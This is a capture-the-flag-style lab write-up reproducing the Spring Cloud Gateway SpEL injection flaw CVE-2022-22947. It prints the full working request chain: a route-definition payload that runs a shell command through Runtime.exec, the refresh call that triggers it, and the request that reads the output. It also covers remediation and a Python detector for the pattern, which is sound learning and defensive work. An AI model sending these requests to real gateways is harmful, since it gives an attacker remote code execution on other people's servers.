CVE-2022-22947: reproducing the Spring Cloud Gateway remote code execution vulnerability

Date: 2022-5-14

1、 Vulnerability overview

On March 1, 2022, VMware published an advisory for this vulnerability. When an application built on Spring Cloud Gateway enables and exposes the gateway actuator endpoint, it is open to code injection: an attacker can send crafted requests and achieve arbitrary remote code execution on the host.
 
2、 Impact version

Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
Older, unsupported versions are also affected.
 

3、 Vulnerability principle

In plain terms: the getValue method in ShortcutConfigurable.java can be controlled through the properties parameter of the normalizeProperties function of ConfigurableBuilder in ConfigurationService.java. By adding a malicious route that carries a filter, the attacker triggers the normalization logic for that parameter when the routes are reloaded, and the SpEL expression in the filter argument value is then parsed and evaluated.

Detailed analysis (reference article): https://blog.csdn.net/include_voidmain/article/details/123819107

 

4、 Reproduction environment

Kali Linux + Vulfocus
Attacking machine: Kali Linux
Target: Vulfocus

 

5、 Experimental steps

1. Open Vulfocus and pull the lab image

 

2. Visit the web page and capture the request with a proxy

3. Construct and send the malicious route-definition request

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.117.131:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}
  • id: the name of the new route; it must be globally unique.
  • filters: specifies one or more filters for this route. A filter modifies the request and the response.
      • name: the filter to add. Here it is AddResponseHeader, a filter that adds a response header before the gateway returns the response to the client.
      • args.name: the name of the response header to add.
      • args.value: the value of the response header. Here it is the SpEL expression that runs the whoami command. Note that the trailing newline of the command output has to be removed, otherwise the filter throws an exception saying that the response header value cannot end with \r or \n.
  • uri: client requests matching this route are forwarded to http://example.com.

 

4. Send the following request to refresh the gateway routes. This is the step that triggers evaluation of the expression.

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.117.131:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

 

5. Send the following request and check the command output. The route added earlier is returned.

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.117.131:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

6. Access the actuator API

GET /actuator HTTP/1.1
Host: 192.168.117.131:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

7. Access the env endpoint and get the flag

 

8. Done, celebrate

 

6、 Remediation

1) 3.1.x users should upgrade to 3.1.1 or later;

2) 3.0.x users should upgrade to 3.0.7 or later;

3) If the gateway actuator endpoint is not needed, disable it with the configuration management.endpoint.gateway.enabled: false.
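As an added defensive example that is not part of the original write-up, the following Python snippet walks captured gateway requests and flags the two-step pattern used above: a route definition whose filter or predicate args contain a SpEL template ("#{...}"), followed by a /actuator/gateway/refresh call from the same source, which is the point at which the expression would be evaluated. The request record format and the sample traffic are constructed for this example.

```python
import json
import re

# Actuator paths exercised in the reproduction: the route-definition endpoint and the
# refresh call that makes the gateway normalise (and so evaluate) the stored filter args.
ROUTE_PATH = re.compile(r"^/actuator/gateway/routes/[^/]+$")
REFRESH_PATH = "/actuator/gateway/refresh"
SPEL_MARKER = re.compile(r"#\{")  # SpEL template delimiter "#{...}"

def route_body_has_spel(body):
    """True if a route definition carries a SpEL template in any filter or predicate arg."""
    try:
        route = json.loads(body or "")
    except json.JSONDecodeError:
        return False
    for section in ("filters", "predicates"):
        for item in route.get(section) or []:
            for value in (item.get("args") or {}).values():
                if isinstance(value, str) and SPEL_MARKER.search(value):
                    return True
    return False

def flag_requests(requests):
    """Walk requests in order; each is a dict with src, method, path, body (constructed format).

    Reports (a) a route definition containing SpEL and (b) a later refresh from the same
    source, which is when the gateway would evaluate the expression.
    """
    findings, tainted = [], set()
    for r in requests:
        if r["method"] == "POST" and ROUTE_PATH.match(r["path"]) and route_body_has_spel(r.get("body")):
            tainted.add(r["src"])
            findings.append(f"{r['src']} defined route with SpEL at {r['path']}")
        elif r["method"] == "POST" and r["path"] == REFRESH_PATH and r["src"] in tainted:
            findings.append(f"{r['src']} refreshed routes after SpEL route (trigger)")
    return findings

# Constructed sample traffic (not real captures): a benign route change, then the abuse pattern.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "method": "POST", "path": "/actuator/gateway/routes/orders",
     "body": json.dumps({"id": "orders", "uri": "http://orders:8080",
                         "predicates": [{"name": "Path", "args": {"pattern": "/orders/**"}}]})},
    {"src": "10.0.0.5", "method": "POST", "path": REFRESH_PATH, "body": ""},
    {"src": "192.0.2.10", "method": "POST", "path": "/actuator/gateway/routes/hacktest",
     "body": json.dumps({"id": "hacktest", "uri": "http://example.com",
                         "filters": [{"name": "AddResponseHeader",
                                      "args": {"name": "Result", "value": "#{new String('spel')}"}}]})},
    {"src": "192.0.2.10", "method": "POST", "path": REFRESH_PATH, "body": ""},
]

def analyze_sample():
    return flag_requests(SAMPLE_REQUESTS)

if __name__ == "__main__":
    for line in analyze_sample():
        print(line)
```

The benign route from 10.0.0.5 produces no finding, so the rule keys on the SpEL marker rather than on any use of the actuator route endpoints.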